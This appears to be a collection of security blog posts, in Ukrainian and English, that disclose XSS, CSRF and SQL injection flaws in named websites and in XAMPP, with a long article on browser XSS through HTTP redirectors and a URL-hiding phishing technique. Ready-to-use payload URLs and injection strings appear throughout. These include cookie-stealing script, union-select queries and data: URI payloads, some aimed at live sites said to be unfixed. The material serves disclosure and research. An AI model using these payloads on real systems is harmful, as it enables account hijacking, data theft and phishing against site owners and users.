Websecurity - Веб безпека

У грудні, 13.12.2008, я знайшов Cross-Site Scripting уразливості на проекті http://addons.miranda-im.org. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на addons.miranda-im.org.

XSS:

• alert(document.cookie)
• цікавий
• html включення

POST запит на сторінці http://addons.miranda-im.org/login.php в полі Username. Зараз ця уразливість вже виправлена (через зміни в роботі форми логіна).

POST запит на сторінці http://addons.miranda-im.org/login.php ?action=lostpwd

"><script>alert(document.cookie)</script>В поліях: Username та E-mail.

This is English version of my Cross-Site Scripting attacks via redirectors article.

In this article I’ll tell you about using of redirectors in different browsers for conducting of Cross-Site Scripting attacks. Which can be conduct for the purpose of stealing cookies, or access to web site’s pages for making of various advanced attacks (in case when there is connection between code which is executed via redirector and the site), and also for the purpose of conducting of fishing attacks and execution of JavaScript code (in case when there is no such connection).

Besides that redirectors allow to redirect to malicious and fishing sites (which is Redirector vulnerability), there are also other variants of attacks with their use. Particularly in my articles Redirectors’ hell and Hellfire for redirectors I wrote about using of redirectors for DoS attacks. Already in January 2008 I planned to write an article about various attacks with using of redirectors (was planning to make anthology of attacks via redirectors), which I’d certainly do, but now I’d tell about one of this attacks - about XSS attacks via redirectors.

There are two types of redirectors (server-side): location-header, which works via Location header, and refresh-header, which works via Refresh header.

In different browsers (via vulnerabilities in them) XSS attacks are possible in different redirectors. Attacks are doing via redirection to javascript: URI and data: URI.

Attack #1

As I wrote about Cross-Site Scripting vulnerabilities in Mozilla, Internet Explorer, Opera and Chrome, in browsers Mozilla 1.7.x (and previous versions), Mozilla Firefox 3.0.8 (and previous versions), Internet Explorer 6 (and previous versions, but not IE7 and IE8), Opera 9.52 (and previous and next versions) and Google Chrome 1.0.154.48 (and previous and next versions) is possible XSS attack via refresh-header redirectors. Attack is doing by redirecting to javascript: URI.

Method of attack:

With request to script at web site:
http://site/script.php?param=javascript:alert(document.cookie)
Which returns in answer the Refresh header:
Refresh: 0; URL=javascript:alert(document.cookie)
The code will execute in context of this site.

This vulnerability in browsers can be used for conducting of reflected XSS attacks.

Attack #2

As I wrote about Cross-Site Scripting vulnerabilities in Mozilla, Firefox and Chrome, in browsers Mozilla 1.7.x (and previous versions), Mozilla Firefox 3.0.12 (and previous and next versions) and Google Chrome 1.0.154.48 (and previous and next versions) is possible XSS attack via refresh-header redirectors. Attack is doing by redirecting to data: URI (with or without using of base64).

Method of attack:

With request to script at web site:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Which returns in answer the refresh header and the code will execute in the browser:
refresh: 0; URL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Because in browsers Firefox 3.0.12 and Google Chrome the code is executing not in context of this site, hence there is no access to cookies, but it can be done in old Mozilla. This vulnerability in browsers (modern) can be used for conducting of fishing attacks and executing of JavaScript code.

Attack #3

As I wrote about Cross-Site Scripting vulnerabilities in Firefox and Opera, in browsers Mozilla Firefox 3.0.12 (and previous and next versions) and Opera 9.52 (and previous and next versions) is possible XSS attack via location-header redirectors. Attack is doing by redirecting to data: URI (with or without using of base64).

Method of attack:

With request to script at web site:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
Which returns in answer the Location header and the code will execute in the browser:
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Because in browsers Firefox and Opera the code is executing not in context of this site, hence there is no access to cookies. This vulnerability in browsers can be used for conducting of fishing attacks and executing of JavaScript code.

Both types of redirectors, location-header and refresh-header, very widespread in Internet, but most widespread are location-header redirectors. So existence of vulnerabilities which work via location-header redirectors pose the most threat. Particularly via this vulnerability in browsers are possible attacks via redirection services, as I wrote concerning vulnerability at tinyurl.com. It allows to spread malware via redirection services, when there will be set the code of exploit instead of address for redirection.

Attack #4

All modern browsers don’t allow execution of JavaScript code by redirecting to javascript: URI in location-header redirectors. But as showed my researches - it’s not always so. As I wrote about Cross-Site Scripting vulnerabilities in Mozilla and Firefox, in browsers Mozilla 1.7.x (and previous versions) and Mozilla Firefox 3.0.12 (and previous and next versions) is possible XSS attack via location-header redirectors, which use answer “302 Object moved”. Attack is doing by redirecting to javascript: URI (and also it’s possible to conduct attack to data: URI).

Method of attack:

With request to script at web site:
http://site/script.php?param=javascript:alert(document.cookie)
Which returns in answer the Location header:
HTTP/1.x 302 Object moved
Location: javascript:alert%28document.cookie%29
The browser will show “Object Moved” page. At click on the link “here” the code will execute in context of this site.

This vulnerability in browsers can be used for conducting of Strictly social XSS attacks.

Attack #5

After initial publication of the article, Aung Khant informed me at 24.08.2009 about vulnerability in Maxthon 3 Alpha (3.0.0.145) with Ultramode. Which allows execution of JavaScript code by redirecting to javascript: URI in location-header redirectors. It’s variation of attack #4 (which I checked, but not found in other browsers, but he found it in Maxthon). If in that case XSS attack is possible via location-header redirectors, which use answer “302 Object moved”, then in this case attack is possible with any 301 and 302 answers of redirectors. Attack is doing by redirecting to javascript: URI.

Method of attack:

With request to script at web site:
http://site/script.php?param=javascript:alert(document.cookie)
Which returns in answer the Location header:
Location: javascript:alert%28document.cookie%29
The browser will show “Unable to connect to the site” page. At click on the link “Refresh the page” the code will execute. Besides, there is the same behaviour in Maxthon 3 Alpha in attacks #3,4,5 (code executes not in context of the site).

This vulnerability in Maxthon can be used for conducting of Strictly social XSS attacks.

Note, that in case of execution of JavaScript code by redirecting to data: URI, when code is executing not in context of this site, the danger exists. Because this vulnerabilities can be used for conducting of fishing attacks and executing of JavaScript code (for malware spreading).

Main advantages of this attack method for criminals, in comparison with ordinary redirection to their site, is first that they don’t need even to have their site (so it’ll be harder to trace them, and also it’ll be impossible to close their site). And second that none anti-fishing and anti-malware filter (in browsers and email) will can’t filter out them, because there will no such address in their base (because not http: address, but data: is using), i.e. bypass of all filters is possible. So it’s needed to fix all mentioned vulnerabilities in browsers.

Attack #6

As I wrote about Cross-Site Scripting vulnerability in Mozilla, Firefox and other browsers, in browsers Mozilla 1.7.x (and previous versions) and Mozilla Firefox 3.0.19 (and previous and next versions) and potentially in other browsers is possible XSS attack via location-header redirectors, which use answer “302 Found”. Attack is doing by redirecting to javascript: URI (and also it’s possible to conduct attack to data: URI). This attack is similar to attack #4.

Method of attack:

With request to script at web site:
http://site/script.php?param=javascript:alert(document.cookie)
Which returns in answer the Location header:
HTTP/1.x 302 Found
Location: javascript:alert(document.cookie)
The browser will show “Found” page. At click on the link “here” the code will execute in context of this site.

This vulnerability in browsers can be used for conducting of Strictly social XSS attacks.

Attacks #7,8

In article Cross-Site Scripting via redirectors 301 and 303 in different browsers I’ve described two more attacks via redirectors with status 301 and 303. These are attacks via data: and javascript: URI.

[Update: 05.08.2009]

As I checked, Mozilla Firefox 3.0.13 is also vulnerable to attacks #2,3,4.

In case of all browsers which are vulnerable to attacks #1,4, JS code executes in context of the site.

[Update: 22.08.2009]

As I found with help of Aung Khant from YEHG Team, the next browsers are also vulnerable:

Google Chrome 2.0.172.28, 2.0.172.37 and 3.0.193.2 Beta - vulnerable to attacks #1,2.

QtWeb 3.0 Build 001 and 3.0 Build 003 - vulnerable to attacks #1,2,3.

Safari 4.0.3 - vulnerable to attacks #1,2.

Opera 10.00 Beta 3 Build 1699 - vulnerable to attacks #1,3.

SeaMonkey 1.1.17 - vulnerable to attacks #1,2,4 and in #1,2,4 JS code executes in context of the site.

[Update: 25.08.2009]

New information from Aung Khant from YEHG Team:

Firefox 3.6 a1 pre - vulnerable to attacks #1,2,3,4 and in #1,2,4 JS code executes in context of the site.

Firefox 3.7 a1 pre - vulnerable to attacks #2,3,4.

Orca Browser 1.2 build 5 - vulnerable to attacks #2,3,4.

Maxthon 3 Alpha (3.0.0.145 and 3.0.2.2) with Ultramode (Apple’s WebKit emulation) - vulnerable to attacks #1,2. And also vulnerable to attacks #3,4,5 as Strictly social XSS.

[Update: 05.08.2010]

Added information about attack #6.

[Update: 07.08.2010]

New information:

Mozilla Firefox 3.0.19 - vulnerable to attacks #2,3,4,6 and in #4,6 JS code executes in context of the site.

Firefox 3.5.11 - vulnerable to attacks #2,3,4,6 and in #4,6 JS code executes in context of the site.

Firefox 3.6.8 - vulnerable to attacks #2,3,4,6 and in #4,6 JS code executes in context of the site.

Firefox 4.0b2 - vulnerable to attacks #2,3,4,6 and in #4,6 JS code executes in context of the site.

Opera 10.53 - vulnerable to attacks #1,4,5,6.

[Update: 16.09.2012]

New information:

Firefox 3.5.19, Firefox 3.6.28 - vulnerable to attacks #2,3,4,6 and in #4,6 JS code executes in context of the site.

Firefox 10.0.7, Firefox 15.0.1 - vulnerable to attacks #2,3. In versions Firefox 10.0.7 and 15.0.1 the attacks #4,6 are no more possible - these vulnerabilities were hiddenly fixed by Mozilla in Firefox 9.0.

Opera 10.62 - vulnerable to attacks #1,4,5,6.

[Update: 25.09.2012]

Added information about attacks #7 and #8.

07.05.2009

У серпні, 19.08.2008, я знайшов SQL Injection уразливість, а сьогодні ще нові SQL Injection та Cross-Site Scripting уразливості на сайті http://www.kino-ukraina.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на kino-ukraina.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.08.2009

SQL Injection:

http://www.kino-ukraina.com.ua/?id=-1%27%20or%201=1/*

Вже виправлена в результаті змін на сайті.

http://www.kino-ukraina.com.ua/showwait.php?wait_id=84%20and%20version()=5

http://www.kino-ukraina.com.ua/showwait.php?wait_id=-1%20union%20select%200,0,version(),0%23

http://www.kino-ukraina.com.ua/showfilm.php?film_id=88%20and%20version()=5

http://www.kino-ukraina.com.ua/showopen.php?opening_id=53%20and%20version()=5

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Більшість з уразливостей так досі й не виправлені.

В даній добірці експлоіти в веб додатках:

• Webspell 4 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit (деталі)
• Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit (деталі)
• Joomla Component simple_review 1.x SQL Injection Vulnerability (деталі)
• Ayemsis Emlak Pro (Auth Bypass) SQL Injection Vulnerability (деталі)
• Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability (деталі)
• The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit (деталі)
• plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability (деталі)
• PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability (деталі)
• WSN Guest 1.23 (search) Remote SQL Injection Vulnerability (деталі)
• PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities (деталі)
• Joomla com_phocadocumentation (id) Remote SQL Injection Exploit (деталі)
• Joomla com_na_newsdescription (newsid) SQL Injection Exploit (деталі)
• PHPAuctionSystem Insecure Cookie Handling Vulnerability (деталі)
• K-Links Directory Blind SQL Injection Exploit (деталі)

This is English version of my URL Hiding - new method of URL Spoofing attacks article.

In continue of my researches of vulnerabilities in search engines, I tell you about new interesting method of URL Spoofing attacks, which I called URL Hiding. It can be used for conducting of fishing attacks and for spreading of malware (particularly it can be used with previously described methods). This URL Hiding attack I found in Google, but other search engines also can be vulnerable.

This month, 19.05.2009, during searching in Google, I found interesting site, which not shows its URL in serp. I saw such sites earlier during using of Google (from 2000), but it’s first site which address I wrote down. This site is http://_-lilit-_.photosight.ru.

site:_-lilit-_.photosight.ru

In case when URL Hiding is using together with URL Spoofing methods, which I wrote about earlier (when long URL is made, e.g. with using of “_” char), then it improves the effectiveness of fishing and others attacks. Because long and suspicious URL will not be shown in serp of search engine, and when user will go by the link, then he can to not notice the URL (via using of URL Spoofing methods).

As I thought first, when using of underscore (like in case of http://_-lilit-_.photosight.ru), Google will not show address in serp at all. But there is no such effect in case of http://ane4ka-_.shalala.ru. Potentially it works only in case, if first char of domain is underscore.

I made a lot of researches when I was looking for sites with underscores, which hasn’t URL in serp, but didn’t find any such sites (but found one interesting bug in Google). So method of attack on Google for hiding of address of sites in serp can use this (with underscore at the beginning of domain), or other approach. But in any case URL Hiding attack is dangerous, because it allows to use search engines (Google in particular) for conducting of fishing and other attacks.

Виявлене пошкодження пам’яті в Adobe Flash Player. Що призводить до виконання коду, як я вже писав раніше і наводив приклад експлоіта для Adobe Flash.

Уразливі продукти: Adobe Flash Player 9.0, Flash Player 10.0, Acrobat 9.1, Adobe Reader 9.1.

Пошкодження пам’яті при відтворенні Flash.

• Adobe Flash Vulnerability Affects Flash Player and Other Adobe Products (деталі)
• Security advisory for Adobe Reader, Acrobat and Flash Player (деталі)

В даній добірці уразливості в веб додатках:

• Aztech ADSL2/2+ 4 Port default password (деталі)
• New slash packages fix multiple vulnerabilities (деталі)
• Plesk 8.6.0 authentication flaw allows to gain virtual user priviledges (деталі)
• Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 (деталі)
• Sea-Surfing on the Motorola Surfboard (деталі)
• TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload (деталі)
• BizDirectory <== 2.04 Cross-Site Scripting Vulnerabilities (деталі)
• CS-Cart <= 1.3.5 SQL Injection (деталі)
• Blue Coat K9 Web Protection Response Handling Buffer Overflows (деталі)
• Blue Coat K9 Web Protection “Referer” Header Buffer Overflow (деталі)

Чиновники з органів влади США і Південної Кореї вважають, що кібератака, якій на позаминулому тижні піддалися сім південнокорейських сайтів (серед яких був і офіційний сайт уряду цієї республіки), а також ряд ресурсів у Сполучених Штатах (у їхньому числі були сайти Секретної служби, Федеральної торгової комісії і Міністерства транспорту), була організована Північною Кореєю.

Однак технічний директор каліфорнійської компанії Іmperva Амічай Шульман має свою думку на цей рахунок. Він вважає, що немає ніяких підстав стверджувати, що атака направлялася винятково з Північної Кореї.

За словами Шульмана, для проведення цієї DDoS-атаки використовувалися зомбі, розосереджені по всьому світі. Крім того, така атака коштує порівняно дешево - близько 50000 доларів, що дозволяє замовити її проведення не тільки уряду Північної Кореї, але і горезвісному Тоні Сопрано.

Шульман вважає, що атака дійсно проводилася хакерами, що симпатизують Північній Кореї, однак обвинувачувати в її організації один лише північнокорейський уряд не варто.

По матеріалам http://www.xakep.ru.

25.06.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting, Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

01.08.2009

XSS:

http://site/xampp/ming.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

CSRF:

http://site/xampp/phonebook.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

XSS (persistent):

http://site/xampp/phonebook.php?lastname=%3Cscript%3Ealert(document.cookie)%3C/script%3E&firstname=1

http://site/xampp/phonebook.php?firstname=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/xampp/phonebook.php?firstname=1&phone=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://site/xampp/phonebook.php?action=del&id=-1%20or%201=1

http://site/xampp/phonebook.php?lastname=',sqlite_version())/*&firstname=1 (mq off)

http://site/xampp/phonebook.php?firstname=',sqlite_version(),1)/* (mq off)

http://site/xampp/phonebook.php?firstname=1&phone='),(sqlite_version(),1,'1 (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/phonebook.php?lastname=’&firstname=1

http://site/xampp/phonebook.php?firstname=’

http://site/xampp/phonebook.php?firstname=1&phone=’

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці експлоіти в веб додатках:

• Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit (деталі)
• DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability (деталі)
• ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities (деталі)
• Konqueror <= 4.1 XSS / Remote Crash Vulnerabilities (деталі)
• PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability (деталі)
• PowerNews 2.5.4 (news.php newsid) SQL Injection Vulnerability (деталі)
• w3blabor CMS <= 3.3.0 (Admin Bypass) SQL Injection Vulnerability (деталі)
• phpScribe 0.9 (user.cfg) Remote Config Disclosure Vulnerability (деталі)
• Memberkit 1.0 Remote PHP File Upload Vulnerability (деталі)
• PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit (деталі)
• ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability (деталі)
• phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities (деталі)
• Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability (деталі)
• Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability (деталі)
• Exploits mitsubishi GB-50A (деталі)